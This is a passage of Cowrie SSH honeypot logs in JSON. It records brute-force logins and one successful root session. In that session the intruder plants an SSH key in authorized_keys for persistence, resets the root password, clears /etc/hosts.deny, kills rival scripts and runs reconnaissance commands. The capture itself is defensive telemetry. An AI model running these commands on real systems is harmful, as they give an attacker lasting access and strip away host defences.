"aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T13:10:49.899827Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.login.success","username":"root","password":"Sy@123456","message":"login attempt [root/Sy@123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:10:50.730461Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:10:51.165399Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T13:10:51.166064Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T13:10:51.166899Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:10:51.375835Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:10:51.852102Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T13:10:51.852764Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T13:10:52.063218Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:10:52.064099Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40792,"dst_ip":"1.2.3.4","dst_port":22,"session":"84e7ca30f845","protocol":"ssh","message":"New connection: 212.227.125.160:40792 (1.2.3.4:22) [session: 84e7ca30f845]","sensor":"my-vps","timestamp":"2025-08-28T13:11:02.096253Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:11:02.106027Z","src_ip":"212.227.125.160","session":"84e7ca30f845"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:11:02.271219Z","src_ip":"212.227.125.160","session":"84e7ca30f845"}
{"eventid":"cowrie.login.failed","username":"svn","password":"1234567","message":"login attempt [svn/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T13:11:03.167868Z","src_ip":"212.227.125.160","session":"84e7ca30f845"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:11:04.301477Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-28T13:11:04.302222Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:11:04.438759Z","src_ip":"212.227.125.160","session":"84e7ca30f845"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:11:04.511514Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:11:05.376780Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.command.input","input":"echo \"root:xUAMb4JzyUUS\"|chpasswd|bash","message":"CMD: echo \"root:xUAMb4JzyUUS\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-08-28T13:11:05.377450Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7c60077df4d5963946f33ee01e5479b412ad52b7f91aa0ce9999b4f37a5c5183","size":21,"shasum":"7c60077df4d5963946f33ee01e5479b412ad52b7f91aa0ce9999b4f37a5c5183","duplicate":false,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7c60077df4d5963946f33ee01e5479b412ad52b7f91aa0ce9999b4f37a5c5183 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:11:05.586128Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:11:06.068250Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-08-28T13:11:06.068973Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-08-28T13:11:06.280202Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:11:06.281301Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:11:06.757857Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-08-28T13:11:06.758735Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:11:06.968736Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:11:07.448781Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-08-28T13:11:07.449471Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:11:07.659323Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:11:08.135855Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-08-28T13:11:08.136530Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-08-28T13:11:08.137006Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:11:08.346805Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:11:08.823503Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-08-28T13:11:08.824252Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:11:09.033865Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:11:09.879011Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-08-28T13:11:09.879658Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":205,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:11:10.088708Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:11:10.523816Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-08-28T13:11:10.524478Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:11:10.733101Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:11:11.210426Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-28T13:11:11.211164Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:11:11.420698Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:11:11.902547Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-08-28T13:11:11.903269Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:11:12.112739Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:11:12.590002Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-08-28T13:11:12.590764Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:11:12.799621Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:11:13.659869Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T13:11:13.660556Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:11:13.869372Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:11:14.304168Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-28T13:11:14.304940Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:11:14.513766Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:11:14.991250Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-08-28T13:11:14.991934Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:11:15.202020Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:11:15.680180Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-08-28T13:11:15.680852Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:11:15.892106Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.session.closed","duration":"26.2","message":"Connection lost after 26.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:11:15.893214Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":20864,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a17729b79a3","protocol":"ssh","message":"New connection: 212.227.125.160:20864 (1.2.3.4:22) [session: 5a17729b79a3]","sensor":"my-vps","timestamp":"2025-08-28T13:11:27.225458Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T13:11:27.226740Z","src_ip":"212.227.125.160","session":"5a17729b79a3"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T13:11:27.285828Z","src_ip":"212.227.125.160","session":"5a17729b79a3"}
{"eventid":"cowrie.login.failed","username":"admin","password":"777vlad","message":"login attempt [admin/777vlad] failed","sensor":"my-vps","timestamp":"2025-08-28T13:11:27.569048Z","src_ip":"212.227.125.160","session":"5a17729b79a3"}
{"eventid":"cowrie.login.failed","username":"admin","password":"6767","message":"login attempt [admin/6767] failed","sensor":"my-vps","timestamp":"2025-08-28T13:11:28.631218Z","src_ip":"212.227.125.160","session":"5a17729b79a3"}
{"eventid":"cowrie.login.failed","username":"admin","password":"6565","message":"login attempt [admin/6565] failed","sensor":"my-vps","timestamp":"2025-08-28T13:11:29.693059Z","src_ip":"212.227.125.160","session":"5a17729b79a3"}
{"eventid":"cowrie.login.failed","username":"admin","password":"500500","message":"login attempt [admin/500500] failed","sensor":"my-vps","timestamp":"2025-08-28T13:11:30.755084Z","src_ip":"212.227.125.160","session":"5a17729b79a3"}
{"eventid":"cowrie.login.failed","username":"admin","password":"369852147","message":"login attempt [admin/369852147] failed","sensor":"my-vps","timestamp":"2025-08-28T13:11:31.816954Z","src_ip":"212.227.125.160","session":"5a17729b79a3"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:11:32.879171Z","src_ip":"212.227.125.160","session":"5a17729b79a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58212,"dst_ip":"1.2.3.4","dst_port":22,"session":"6298b253ad8d","protocol":"ssh","message":"New connection: 212.227.125.160:58212 (1.2.3.4:22) [session: 6298b253ad8d]","sensor":"my-vps","timestamp":"2025-08-28T13:11:38.828454Z"}
